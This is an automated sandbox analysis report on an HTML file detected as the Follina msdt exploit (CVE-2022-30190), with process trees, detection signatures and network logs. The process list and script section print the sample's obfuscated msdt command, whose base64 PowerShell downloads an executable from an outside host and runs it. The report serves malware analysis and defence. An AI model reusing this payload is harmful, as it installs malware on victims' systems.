Windows
Analysis Report
fbGUvJ4AdV.html
Overview
General Information
Detection
Score: | 56 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- chrome.exe (PID: 5708 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" --sta rt-maximiz ed "about: blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408) - chrome.exe (PID: 5404 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =1948 --fi eld-trial- handle=174 0,i,146183 3536596493 5446,52640 8918602730 7751,13107 2 /prefetc h:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408) - msdt.exe (PID: 6208 cmdline:
"C:\Window s\system32 \msdt.exe" ms-msdt:/ Id%20PcwDi agnOstic%2 0-skIP%20F ORCE%20-pa raM%20%22I t_ReBrOwse foRfILE=#f bK%20IT_La unchMethod =ContextMe nu%20IT_Br owseForFil e=I$(Iex($ (Iex('[SYS tem.teXT.e NCoDiNG]'+ [ChaR]0x3A +[cHaR]58+ 'UTF8.gEtS TRInG([SYS tEm.conVeR T]'+[CHAR] 58+[ChAR]5 8+'fROmbas E64strInG( '+[ChaR]0X 22+'c1RPcC 1QUk9jZXNz IC1GT1JDZS AtTkFtZSAn bXNkdCc7JH NZID0gQWRk LVRZcEUgLW 1FbUJFUmRF RmluaXRpT0 4gJ1tEbGxJ bXBvcnQoIn VSTE1vbi5k TEwiLCBDaG FyU2V0ID0g Q2hhclNldC 5Vbmljb2Rl KV1wdWJsaW Mgc3RhdGlj IGV4dGVybi BJbnRQdHIg VVJMRG93bm xvYWRUb0Zp bGUoSW50UH RyIHUsc3Ry aW5nIEksc3 RyaW5nIGMs dWludCBzUC xJbnRQdHIg Vik7JyAtTm FtZSAibHhQ IiAtTmFtRV NwQWNlIEtJ eCAtUGFzc1 RocnU7ICRz WTo6VVJMRG 93bmxvYWRU b0ZpbGUoMC wiaHR0cHM6 Ly9hLnBvbW YuY2F0L2lw cmlnay5leG UiLCIkZW5W OkFQUERBVE FcQ2JodHIu ZXhlIiwwLD ApO1NUQVJ0 LVNMRWVwKD MpO1J1bkRs bDMyLkVYZS B6aXBmbGRy LmRsbCxSb3 V0ZVRoZUNh bGwgIiRFbn Y6QVBQREFU QVxDYmh0ci 5leGUiO3NU b3AtUFJPQ0 VzcyAtZm9S Q0UgLU5hbW UgJ3NkaWFn bmhvc3Qn'+ [Char]34+' ))'))))Ti/ ../../../. ./../../.. /../../../ .mSi%20%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
- chrome.exe (PID: 1108 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" "C:\U sers\user\ Desktop\fb GUvJ4AdV.h tml MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Exploits |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Directory created: | Jump to behavior |
Source: | IP Address: |
Source: | DNS traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | Virustotal: |
Source: | File created: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Classification label: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: |
Source: | File opened: | Jump to behavior |
Source: | Window detected: |
Source: | Directory created: | Jump to behavior |
Source: | String : | Go to definition | ||
Source: | String : | Go to definition | ||
Source: | String : | Go to definition | ||
Source: | String : | Go to definition |
Source: | Window / User API: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 1 Command and Scripting Interpreter | Path Interception | 1 Process Injection | 2 Masquerading | OS Credential Dumping | 1 Application Window Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 1 Scripting | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Process Injection | LSASS Memory | 1 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Data Encoding | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Scripting | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 4 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | 1 Ingress Tool Transfer | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
12% | ReversingLabs | Script.Exploit.Heuristic | ||
12% | Virustotal | Browse | ||
0% | Metadefender | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
accounts.google.com | 216.58.215.237 | true | false | high | |
www.google.com | 172.217.168.36 | true | false | high | |
clients.l.google.com | 172.217.168.78 | true | false | high | |
clients2.google.com | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
216.58.215.237 | accounts.google.com | United States | 15169 | GOOGLEUS | false | |
172.217.168.78 | clients.l.google.com | United States | 15169 | GOOGLEUS | false | |
172.217.168.36 | www.google.com | United States | 15169 | GOOGLEUS | false | |
239.255.255.250 | unknown | Reserved | unknown | unknown | false |
IP |
---|
192.168.2.1 |
192.168.2.4 |
192.168.2.5 |
192.168.2.23 |
127.0.0.1 |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 696621 |
Start date and time: | 2022-09-02 15:27:50 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 56s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | fbGUvJ4AdV.html |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 25 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal56.expl.winHTML@39/0@4/9 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
- Excluded IPs from analysis (whitelisted): 172.217.168.35, 142.250.203.110, 74.125.160.202, 216.58.215.234, 172.217.168.67
- Excluded domains from analysis (whitelisted): r5---sn-4g5e6nzs.gvt1.com, client.wns.windows.com, fs.microsoft.com, r2---sn-4g5e6nzz.gvt1.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, r5---sn-4g5ednsz.gvt1.com, r5.sn-4g5lznez.gvt1.com, arc.msn.com, ris.api.iris.microsoft.com, r4---sn-4g5e6nsk.gvt1.com, redirector.gvt1.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, r5---sn-4g5lznez.gvt1.com, optimizationguide-pa.googleapis.com
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtWriteVirtualMemory calls found.
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
239.255.255.250 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
File type: | |
Entropy (8bit): | 6.049533660136345 |
TrID: | |
File name: | fbGUvJ4AdV.html |
File size: | 19189 |
MD5: | da3469806af3aacbbbd22a763343fff2 |
SHA1: | 6d9fd23a4d32a5963c24d39b5402eeaf2a54f093 |
SHA256: | c3afbf5a136b204e16eb6e1cf00cbb03ee36eff42f519f26f1d1d1e58f0b87e1 |
SHA512: | 7e0cbfb15bf2bc8bbbb1727ba9bcfc472bad56b6887457be564ab84b1d69c6ad81dc827e1d04cc57f3f3e4255494484073dee58a79a390e08fe3888939730a2d |
SSDEEP: | 384:9W4t9eJgaU7XWH7/hjoNso7qSVUajB+IOFFUD6kNTPhFEsAll:neJgaUShENTHVFVwHM1phFEse |
TLSH: | A082C0A9D03658346DD45C134A753D96BD20FA75C4BC9B282E4CF72D532D4E1ED8283A |
File Content Preview: | <!DOctYpE hTmL>....<HtML>....<bodY>....<ScRiPT laNGUAGe="jscripT">....//Nn2wp6S4Yl6LHD8RlkuH2nRrwM4IwiGC2LqC6DJpN8XYHUc8JE1CS322bpIjLLlSzFr2pDpqdRNlULZdgV0m7sAoiC4lFm8MHONeXSmmMbu8RCnbuU8BXfdqJNfW9P9Ywgg9nOxJaWPpgS3g05gaFqEmQGOCbebhz32j6P95K6A0kX8Y1Cv7mnh |
Icon Hash: | 78d0a8cccc88c460 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 2, 2022 15:28:54.879998922 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 15:28:54.880044937 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 15:28:54.880124092 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 15:28:54.880600929 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 15:28:54.880621910 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 15:28:54.894287109 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 15:28:54.894330978 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 15:28:54.894418001 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 15:28:54.894710064 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 15:28:54.894727945 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 15:28:54.943497896 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 15:28:54.960045099 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 15:28:54.989614010 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 15:28:54.989650965 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 15:28:54.989794970 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 15:28:54.989814043 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 15:28:54.990809917 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 15:28:54.990840912 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 15:28:54.990910053 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 15:28:54.991908073 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 15:28:54.992002010 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 15:28:54.993104935 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 15:28:54.993181944 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 15:28:54.993199110 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 15:28:55.175978899 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 15:28:56.073260069 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 15:28:56.073594093 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 15:28:56.073594093 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 15:28:56.073848963 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 15:28:56.073986053 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 15:28:56.074013948 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 15:28:56.074413061 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 15:28:56.109338999 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 15:28:56.109447956 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 15:28:56.109489918 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 15:28:56.109589100 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 15:28:56.109668970 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 15:28:56.115366936 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 15:28:56.130569935 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 15:28:56.130816936 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 15:28:56.130831957 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 15:28:56.130899906 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 15:28:56.146040916 CEST | 49750 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 15:28:56.146084070 CEST | 443 | 49750 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 15:28:56.148969889 CEST | 49749 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 15:28:56.148992062 CEST | 443 | 49749 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 15:28:57.917635918 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:28:57.917695045 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:28:57.917794943 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:28:57.918090105 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:28:57.918113947 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:28:57.978068113 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:28:57.983189106 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:28:57.983237028 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:28:57.984797001 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:28:57.984909058 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:28:57.987863064 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:28:57.988006115 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:28:58.068564892 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:28:58.068614006 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:28:58.181607008 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:29:07.962944984 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:29:07.963063955 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:29:07.963167906 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:29:08.197738886 CEST | 49756 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:29:08.197777033 CEST | 443 | 49756 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:29:58.076714039 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:29:58.076778889 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:29:58.076863050 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:29:58.077224016 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:29:58.077243090 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:29:58.127197027 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:29:58.155210972 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:29:58.155257940 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:29:58.155771017 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:29:58.163119078 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:29:58.163317919 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:29:58.208867073 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:30:08.124836922 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:30:08.125193119 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:30:08.125253916 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:30:53.141551971 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:30:53.141625881 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 15:31:38.253438950 CEST | 49810 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 15:31:38.253495932 CEST | 443 | 49810 | 172.217.168.36 | 192.168.2.3 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 2, 2022 15:28:54.772237062 CEST | 51139 | 53 | 192.168.2.3 | 8.8.8.8 |
Sep 2, 2022 15:28:54.772720098 CEST | 52955 | 53 | 192.168.2.3 | 8.8.8.8 |
Sep 2, 2022 15:28:54.799750090 CEST | 53 | 52955 | 8.8.8.8 | 192.168.2.3 |
Sep 2, 2022 15:28:54.801990986 CEST | 53 | 51139 | 8.8.8.8 | 192.168.2.3 |
Sep 2, 2022 15:28:57.896194935 CEST | 57704 | 53 | 192.168.2.3 | 8.8.8.8 |
Sep 2, 2022 15:28:57.915808916 CEST | 53 | 57704 | 8.8.8.8 | 192.168.2.3 |
Sep 2, 2022 15:29:57.981518030 CEST | 58119 | 53 | 192.168.2.3 | 8.8.8.8 |
Sep 2, 2022 15:29:58.001106977 CEST | 53 | 58119 | 8.8.8.8 | 192.168.2.3 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Sep 2, 2022 15:28:54.772237062 CEST | 192.168.2.3 | 8.8.8.8 | 0x5880 | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 15:28:54.772720098 CEST | 192.168.2.3 | 8.8.8.8 | 0xbec1 | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 15:28:57.896194935 CEST | 192.168.2.3 | 8.8.8.8 | 0x7fb0 | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 15:29:57.981518030 CEST | 192.168.2.3 | 8.8.8.8 | 0x9f76 | Standard query (0) | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Sep 2, 2022 15:28:54.799750090 CEST | 8.8.8.8 | 192.168.2.3 | 0xbec1 | No error (0) | 216.58.215.237 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 15:28:54.801990986 CEST | 8.8.8.8 | 192.168.2.3 | 0x5880 | No error (0) | clients.l.google.com | CNAME (Canonical name) | IN (0x0001) | ||
Sep 2, 2022 15:28:54.801990986 CEST | 8.8.8.8 | 192.168.2.3 | 0x5880 | No error (0) | 172.217.168.78 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 15:28:57.915808916 CEST | 8.8.8.8 | 192.168.2.3 | 0x7fb0 | No error (0) | 172.217.168.36 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 15:29:58.001106977 CEST | 8.8.8.8 | 192.168.2.3 | 0x9f76 | No error (0) | 172.217.168.36 | A (IP address) | IN (0x0001) |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49750 | 216.58.215.237 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-09-02 13:28:56 UTC | 0 | OUT | |
2022-09-02 13:28:56 UTC | 0 | OUT | |
2022-09-02 13:28:56 UTC | 3 | IN | |
2022-09-02 13:28:56 UTC | 4 | IN | |
2022-09-02 13:28:56 UTC | 4 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.3 | 49749 | 172.217.168.78 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-09-02 13:28:56 UTC | 0 | OUT | |
2022-09-02 13:28:56 UTC | 1 | IN | |
2022-09-02 13:28:56 UTC | 2 | IN | |
2022-09-02 13:28:56 UTC | 2 | IN | |
2022-09-02 13:28:56 UTC | 3 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 15:28:47 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff614650000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 2 |
Start time: | 15:28:52 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff614650000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 3 |
Start time: | 15:28:52 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff614650000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 16 |
Start time: | 15:29:57 |
Start date: | 02/09/2022 |
Path: | C:\Windows\System32\msdt.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7d5070000 |
File size: | 1560576 bytes |
MD5 hash: | 8BE43BAF1F37DA5AB31A53CA1C07EE0C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | moderate |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | location.href = "mS-" + "msDt:" + "/I" + "d" + " " + "Pcw" + "Dia" + "gnOs" + "ti" + "c" + " " + "-sk" + "IP" + " " + "FOR" + "C" + "E" + " " + "-pa" + "raM" + " " + "\"" + "It_ReBrOwsef" + "oR" + "fIL" + "E" + "=" + "#fbK" + " " + "IT_LaunchMethod=ContextMen" + "u" + " " + "IT_" + "B" + "rows" + "eForF" + "ile" + "=" + "I" + "$(" + "Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiL" + "CBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBz" + "UCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly" + "9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNM" + 